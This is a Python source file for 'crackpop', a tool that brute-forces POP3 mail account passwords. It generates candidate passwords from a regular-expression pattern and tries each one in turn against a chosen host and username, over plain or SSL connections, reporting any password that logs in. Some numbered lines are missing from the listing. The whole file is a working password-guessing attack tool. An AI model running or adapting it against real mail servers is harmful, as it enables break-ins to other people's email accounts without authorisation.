3 # crackpop - a pattern-generated-dictionary pop3 password cracker
5 # Copyright (C) 2013 Antonio Ospite <ospite@studenti.unina.it>
7 # This program is free software: you can redistribute it and/or modify
8 # it under the terms of the GNU General Public License as published by
9 # the Free Software Foundation, either version 3 of the License, or
10 # (at your option) any later version.
12 # This program is distributed in the hope that it will be useful,
13 # but WITHOUT ANY WARRANTY; without even the implied warranty of
14 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
15 # GNU General Public License for more details.
17 # You should have received a copy of the GNU General Public License
18 # along with this program. If not, see <http://www.gnu.org/licenses/>.
24 __description = "crackpop is a pattern-generated-dictionary pop3 password cracker"
26 __author_info = "Antonio Ospite"
29 # returns a tuple: (num_passwords, passwords)
30 # where passwords is an iterable type
31 def generate_passwords(password_pattern, dry_run=False):
32 num_passwords = exrex.count(password_pattern)
33 passwords = exrex.generate(password_pattern)
36 print "Generated %d passwords." % num_passwords
41 return (num_passwords, passwords)
44 # the passwords parameter is a tuple: (n, L)
45 # where L is an iterable type and n is the number of elements in L
46 def crackpop(host, port, ssl, user, passwords):
48 pop3_connect = poplib.POP3_SSL
50 pop3_connect = poplib.POP3
52 print "Testing %d passwords." % passwords[0]
53 for p in passwords[1]:
54 # TODO maybe the same connection can be reused for more than one try,
55 # but some logic needs to be added to detect the maximum allowed
56 # authentication attempts or a disconnection from the server.
57 pop3 = pop3_connect(host, port)
63 print e.message, "(password: %s)" % p
67 print "Found! (password: %s)" % p
72 usage = "usage: %(prog)s [options]"
74 parser = argparse.ArgumentParser(
76 description=__description,
78 version='%(prog)s ' + __version)
81 '-H', '--host', metavar="<host>",
82 dest='host', required=True,
83 help='the host where the pop3 server is')
86 '-P', '--port', metavar="<port>",
87 dest='port', default=poplib.POP3_PORT,
88 help='the port the pop3 server is listening on')
91 '-u', '--user', metavar="<user>",
92 dest='user', required=True,
93 help='username of the pop3 account')
96 '-p', '--pattern', metavar="<password_pattern>",
97 dest='password_pattern', required=True,
98 help='the regular expression describing the pattern of the password')
102 dest='dry_run', action='store_const', const=True,
103 help='only print out the passwords, do not connect to the pop3 server')
107 dest='ssl', action='store_const', const=True,
108 help='use SSL to connect to the pop3 server')
111 '-S', '--ssl-port', metavar="<ssl_port>",
112 dest='ssl_port', default=poplib.POP3_SSL_PORT,
113 help='the port the SSL pop3 server is listening on')
118 if __name__ == "__main__":
119 parser = option_parser()
120 args = parser.parse_args()
127 passwords = generate_passwords(args.password_pattern, args.dry_run)
128 crackpop(args.host, port, args.ssl, args.user, passwords)